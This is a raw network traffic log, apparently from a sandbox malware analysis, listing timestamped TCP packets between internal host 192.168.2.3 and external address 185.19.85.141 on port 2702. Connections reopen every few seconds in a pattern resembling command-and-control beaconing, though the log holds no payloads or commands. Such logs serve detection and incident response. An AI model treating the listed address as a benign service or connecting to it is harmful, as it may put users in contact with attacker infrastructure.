May 17, 2022 12:13:22.912822962 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:22.992896080 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:23.102706909 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:23.102813959 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:23.360893965 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:23.361074924 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:23.552587986 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:23.552818060 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:23.742611885 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:23.742693901 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:23.863548040 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:23.980653048 CEST	2702	49757	185.19.85.141	192.168.2.3
May 17, 2022 12:13:23.980741978 CEST	49757	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:27.976253986 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.159682989 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.160903931 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.167370081 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.390932083 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.391068935 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.472251892 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.473531008 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.622581959 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.623320103 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.714168072 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.715831995 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:28.820796013 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.953838110 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:28.953938007 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.192826986 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:29.193592072 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.440679073 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:29.441147089 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.522783041 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:29.522906065 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.632920027 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:29.633099079 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.760251045 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:29.760442019 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.872739077 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:29.872845888 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:29.940778017 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:30.051498890 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:30.051681042 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:30.067383051 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:30.235651970 CEST	2702	49758	185.19.85.141	192.168.2.3
May 17, 2022 12:13:30.235837936 CEST	49758	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:35.495420933 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:35.677213907 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:35.677341938 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:35.677990913 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:35.907257080 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:35.907411098 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.149065971 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.149158001 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.392621040 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.394073963 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.464174986 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.468241930 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.644172907 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.646214008 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.712644100 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.712755919 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.834274054 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.835659981 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:36.944365978 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:36.945550919 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:37.114131927 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:37.114356041 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:37.200613976 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:37.362682104 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:37.362832069 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:37.609785080 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:37.610008955 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:37.661142111 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:37.692838907 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:37.694338083 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:37.789648056 CEST	2702	49759	185.19.85.141	192.168.2.3
May 17, 2022 12:13:37.789742947 CEST	49759	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:41.874874115 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.056740046 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.056930065 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.065696001 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.302598000 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.302757978 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.445064068 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.445178986 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.542748928 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.542901039 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.693939924 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.694036007 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.734173059 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.784923077 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:42.942634106 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:42.942713976 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.175729036 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.175862074 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.423319101 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.423505068 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.537245035 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.537365913 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.612838030 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.615109921 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.792962074 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.794918060 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.852737904 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.856806040 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:43.982917070 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:43.986891031 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:44.039113998 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:44.047719002 CEST	2702	49760	185.19.85.141	192.168.2.3
May 17, 2022 12:13:44.048641920 CEST	49760	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.102842093 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.293232918 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:48.293345928 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.368798971 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.606697083 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:48.606785059 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.682756901 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:48.682971001 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.842746019 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:48.842818975 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:48.903801918 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:49.030889988 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:49.030997038 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:49.272732973 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:49.273467064 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:49.512918949 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:49.513344049 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:49.762613058 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:49.762722969 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.002717018 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:50.004708052 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.122745037 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:50.122915030 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.189753056 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:50.189888000 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.380788088 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:50.383471966 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.395539045 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.435770035 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:50.436593056 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:50.572690010 CEST	2702	49761	185.19.85.141	192.168.2.3
May 17, 2022 12:13:50.573162079 CEST	49761	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:55.732130051 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:55.912636042 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:55.912785053 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:55.935834885 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:56.182977915 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:56.183120012 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:56.232783079 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:56.426748037 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:56.427541018 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:56.428071022 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:56.616796970 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:56.617403030 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:56.855648994 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:56.856868029 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.092756033 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.093964100 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.212918043 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.216161013 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.292800903 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.292953968 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.452771902 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.453062057 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.542690039 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.542828083 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.642759085 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.644046068 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.722687960 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.722950935 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.882781982 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.882898092 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.920209885 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:57.962616920 CEST	2702	49762	185.19.85.141	192.168.2.3
May 17, 2022 12:13:57.964108944 CEST	49762	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:01.987087965 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:02.172674894 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:02.172808886 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:02.189654112 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:02.412693024 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:02.412776947 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:02.522867918 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:02.523013115 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:02.653676987 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:02.653867006 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:02.755752087 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:02.832815886 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:02.832906961 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:03.065571070 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:03.065660954 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:03.295613050 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:03.298513889 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:03.555665016 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:03.557363033 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:03.652786016 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:03.708647966 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:03.742729902 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:03.742861986 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:03.969685078 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:03.969790936 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:04.163258076 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:04.164761066 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:04.353173971 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:04.353307962 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:04.493407011 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:04.592621088 CEST	2702	49763	185.19.85.141	192.168.2.3
May 17, 2022 12:14:04.596921921 CEST	49763	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:08.636831999 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:08.822681904 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:08.822833061 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:08.849775076 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.086028099 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.086230993 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.172717094 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.173229933 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.332786083 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.332904100 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.416017056 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.416147947 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.513267994 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.513365030 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.647141933 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.647245884 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.747176886 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.747303963 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.895634890 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.895793915 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:09.990622997 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:09.990731955 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:10.145764112 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.145838022 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:10.232703924 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.232815027 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:10.385709047 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.385890961 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:10.479180098 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.484615088 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.573184967 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.577281952 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:10.826180935 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:10.826550007 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:11.014519930 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:11.084249020 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:11.174776077 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:11.282888889 CEST	2702	49766	185.19.85.141	192.168.2.3
May 17, 2022 12:14:11.282995939 CEST	49766	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:15.522965908 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:15.712816000 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:15.714327097 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:15.714756966 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:15.972796917 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:15.972965002 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:16.012779951 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:16.212692976 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:16.212872982 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:16.403156042 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:16.403295040 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:16.642754078 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:16.642848015 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:16.880964041 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:16.881077051 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:17.115720987 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:17.115879059 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:17.222790003 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:17.302737951 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:17.302906990 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:17.537178040 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:17.540076017 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:17.722919941 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:17.723901033 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:17.790961981 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:17.912723064 CEST	2702	49767	185.19.85.141	192.168.2.3
May 17, 2022 12:14:17.912826061 CEST	49767	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:22.292354107 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:22.482656002 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:22.483124018 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:22.484039068 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:22.706796885 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:22.707093954 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:22.800736904 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:22.800822020 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:22.960622072 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:22.960721016 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.040740013 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.043230057 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.152925014 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.226126909 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.290649891 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.291059971 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.532620907 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.532867908 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.770486116 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.770591974 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.891462088 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.892498970 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:23.963697910 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:23.968219995 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:24.132716894 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:24.132802963 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:24.212631941 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:24.312654018 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:24.312794924 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:24.492660999 CEST	2702	49768	185.19.85.141	192.168.2.3
May 17, 2022 12:14:24.492811918 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:24.514476061 CEST	49768	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:28.582438946 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:28.764125109 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:28.764328003 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:28.783169985 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:29.023967981 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.024087906 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:29.090488911 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.090573072 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:29.273940086 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.274157047 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:29.335098028 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.464874029 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.468832016 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:29.712927103 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.716836929 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:29.947626114 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:29.950894117 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:30.180640936 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:30.184900999 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:30.429836988 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:30.429913998 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:30.673620939 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:31.257147074 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:31.510715961 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:31.555928946 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:31.601039886 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:31.726691961 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:31.754231930 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:31.754450083 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:32.001600981 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:32.001799107 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:32.192754984 CEST	2702	49774	185.19.85.141	192.168.2.3
May 17, 2022 12:14:32.242336988 CEST	49774	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:14:32.423013926 CEST	2702	49774	185.19.85.141	192.168.2.3
